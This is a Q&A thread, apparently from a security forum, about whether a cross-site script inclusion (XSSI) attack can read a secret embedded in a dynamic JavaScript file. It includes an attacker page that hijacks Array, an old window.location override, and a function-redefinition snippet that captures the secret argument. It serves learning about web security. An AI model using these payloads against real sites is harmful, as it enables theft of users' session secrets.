How to get JS content fron XSSI vulnerability?

Question

I'm learning about XSSI attacks and I'm wondering if the following dynamic JS can be used to access the content.

Dinamic.js:

if (window.location.hostname === 'Demo.site.com' ){
    updateLoginHeader('Nick', 'IWANT-THIS-SECRET'); }

Can the attacker retrieve IWANT-THIS-SECRET using javascript tag? I was trying something like:

<script type="text/javascript">
var secrets;

Array = function() {
  secrets = this;
};
</script>

<script src="https://example.com/Dinamic.js" 
  type="text/javascript"></script>

<script type="text/javascript">

  var yourData = '';
  var i = -1;
  while(secrets[++i]) {
    yourData += secrets[i] + ' ';
  }

  alert('I stole your data: ' + yourData);
</script>

Any ideas to retrieve IWANT-THIS-SECRET?

Is XSSI a simple misspelling of XSS, or do you mean something different? — AviD, May 29 '17 at 07:57
I don't get where the secret is stored. Is it like constant argument of the updateLoginHeader call? — Fis, May 29 '17 at 10:16

Arminius · Accepted Answer · 2017-05-29T15:51:52.010

For a successful cross-site script inclusion attack you'd have to bypass this origin check:

if (window.location.hostname === 'Demo.site.com')

That isn't possible because modern browsers don't allow you to override window.location, as explained here and here. The hostname property is read-only for security reasons. This means that only Demo.site.com can access the IWANT-THIS-SECRET token by executing the JS file.

In older browsers, a redefinition of the property could have looked like this:

window.__defineGetter__("location", function(){
    return { hostname: "attacker.exmaple" }
});

But if you attempt that, you'll get an error message. E.g., for Firefox:

TypeError: can't redefine non-configurable property "location"

If you were able to bypass the origin check, a simple XSSI attack could then work like this:

<script>
function updateLoginHeader() {
    alert(arguments[1]);
}
</script>
<script src="https://targetsite.example/Dinamic.js"></script>

As you can see, you just have to define your own function that captures the "secret" function argument. (Your attempt to redefine Array looks more like an approach to JSON hijacking which isn't helpful here and would also generally be unsuccessful in any modern browser.)

I was trying to use your scripting and using a valid location(For testing) but I can't get the content either. — pancho, May 29 '17 at 16:53
@pancho Could you add the script you tested with to your question? — Arminius, May 29 '17 at 16:54
I was trying ` ` Firefox sent "ReferenceError: updateLoginHeader is not defined" — pancho, May 29 '17 at 17:07
@pancho Well, the script defines a global function `updateLoginHeader` so it's not plausible that Firefox treats it as undefined. This exact example (obviously with a valid link instead of `targetsite.example`) works fine for me. — Arminius, May 29 '17 at 17:34

How to get JS content fron XSSI vulnerability?

1 Answers1